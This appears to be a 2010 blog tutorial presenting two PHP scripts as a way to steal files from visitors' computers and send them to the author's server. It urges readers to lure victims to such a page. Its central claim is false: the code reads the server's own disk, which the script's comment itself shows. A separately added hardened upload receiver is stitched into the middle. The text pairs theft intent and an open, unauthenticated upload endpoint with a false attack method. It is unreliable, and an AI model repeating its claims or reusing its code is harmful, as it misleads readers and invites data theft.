Wednesday, June 23, 2010

Stealing files on the client computer using a PHP script, by Tomero

Before I explain what this title means, I ask that what is practiced here not be used to harm other people. If you practice it with evil intent, that is not my responsibility.

Okay, back to the topic. You certainly would not expect me to know what is behind the data you save on your computer. I do not need to call a shaman and stay up all day waiting for him to finish his work, he .. he .. he. Did you know? With the following PHP script, files that exist on the client computer can be retrieved easily and tucked away on your server. It is enough to trick the victim into opening a site that already has this script inserted; it will then automatically retrieve (upload) the file to the destination path on your server. Here's the script:




1. First File

<?php
// This script is written for PHP
// File name: ScrCuri.php
// Function: sends a file to a processing server
$host = 'localhost';
$port = 80;
// Change $path to the location of upload.php
$path = '/upload.php';
// Replace $myfile with the file you want to take
$myfile = "c:\\autoexec.bat";
$content_type = "text/plain"; // MIME type of the file

// Start header
srand((int) ((float) microtime() * 1000000));
$boundary = "---------------------------" . substr(md5(rand(0, 32000)), 0, 10);
$data = "--$boundary\r\n";
// file() reads $myfile from the filesystem of the machine that executes this PHP script
$content_file = join("", file($myfile));
$data .= "Content-Disposition: form-data; name=\"myfile\"; filename=\"$myfile\"\r\n"
       . "Content-Type: $content_type\r\n\r\n"
       . "$content_file\r\n"
       . "--$boundary";
$data .= "--\r\n\r\n";
$msg = "POST $path HTTP/1.0\r\n"
     . "Content-Type: multipart/form-data; boundary=$boundary\r\n"
     . "Content-Length: " . strlen($data) . "\r\n\r\n";
// End header
$result = "";

// Open connection
$f = fsockopen($host, $port);
fputs($f, $msg . $data);
// Get the response + results
while (!feof($f)) {
    $result .= fread($f, 32000);
}
fclose($f);
// Print the result
echo $result;
?>

2. Second File

<?php
// File name: upload.php
// Function: catches the contents of the request that was sent and copies the uploaded file
// The temporary upload path for the "myfile" form field sent by ScrCuri.php
$fileku = $_FILES['myfile']['tmp_name'] ?? '';
if (is_uploaded_file($fileku)) {
    // Change $store_name to the storage file path you want
    $store_name = "/backup_backup_backup/test/autoexec.bat";
    copy($fileku, $store_name);

    // Show results
    echo "OK";
} else {
    echo "Failed to copy file >> '$fileku'.";
}
?>
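
A hardened counterpart to upload.php, added here as an example and not part of the original post: the receiver above accepts any unauthenticated POST and writes it to a fixed path. The UPLOAD_TOKEN environment variable, the X-Upload-Token header, the /var/uploads directory, the 64 KiB limit and the availability of the fileinfo extension are assumptions.

```php
<?php
// Added example: hardened upload receiver (not the author's code).
// Assumptions: UPLOAD_TOKEN env var, X-Upload-Token header, STORE_DIR, MAX_BYTES.
const STORE_DIR = '/var/uploads';      // hypothetical path, outside the web root
const MAX_BYTES = 65536;               // assumed size cap (64 KiB)
const ALLOWED_TYPES = ['text/plain'];

function reject(int $code, string $why): void {
    http_response_code($code);
    error_log("upload rejected: $why from " . ($_SERVER['REMOTE_ADDR'] ?? '?'));
    exit("rejected\n");
}

// 1. Authenticate the sender; the original accepts any POST.
$expected = getenv('UPLOAD_TOKEN') ?: '';
$given = $_SERVER['HTTP_X_UPLOAD_TOKEN'] ?? '';
if ($expected === '' || !hash_equals($expected, $given)) {
    reject(403, 'bad token');
}

// 2. Read the upload from $_FILES, never from a request-controlled global.
$up = $_FILES['myfile'] ?? null;
if (!is_array($up) || !is_int($up['error']) || $up['error'] !== UPLOAD_ERR_OK
    || !is_uploaded_file($up['tmp_name'])) {
    reject(400, 'no valid upload');
}

// 3. Bound the size and sniff the real content type instead of trusting the client's.
if ($up['size'] > MAX_BYTES) {
    reject(413, 'too large');
}
$type = (new finfo(FILEINFO_MIME_TYPE))->file($up['tmp_name']);
if (!in_array($type, ALLOWED_TYPES, true)) {
    reject(415, "type $type");
}

// 4. Server-chosen name: the client-supplied filename is never used as a path.
$dest = STORE_DIR . '/' . bin2hex(random_bytes(16)) . '.txt';
if (!move_uploaded_file($up['tmp_name'], $dest)) {
    reject(500, 'store failed');
}
chmod($dest, 0640);
echo "OK\n";
```
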
After you have saved the scripts on your server/host, try accessing scrcuri.php to prove it, for example: http://situskamu.com/scrcuri.php. Remember, the configuration must match! To make it easy, just save both files in your server's root, so that upload.php is accessed at http://situskamu.com/upload.php. Understood? Yep ... I hope so .. he .. he .. he.

Try accessing scrcuri.php in a Windows environment ... what happened? Wow ... an autoexec.bat file has been pulled onto your server, that is, taken from your client computer as an experiment.
Before you feel satisfied, you should know that the script above is not perfect (far from it ... so do not be satisfied). Want to know its shortcoming? Yeah ... I know you know it too, right? In our experiment, the script can only retrieve one specific file, which the target computer does not necessarily have. Take the file c:\tomero.gif, for example: not every computer will have a file like that. So, the solution ... just add a bit of JavaScript and modify both scripts above ... If you do not know how, treat it as homework, or if necessary learn a lot more PHP first. Can you manage that too? The most telling habit is "Ask TOMERO, copy-paste it ..." People are basically lazy ... he .. he .. he ..
Finally, once again ... how everything in this post is used is in your hands. I only write and develop ideas with the intention that you be careful on the Internet, even though it is said to be fun ... Forgive me for any mistakes or anything that displeased you. Thank you. God bless ....
Reference: www.php.net
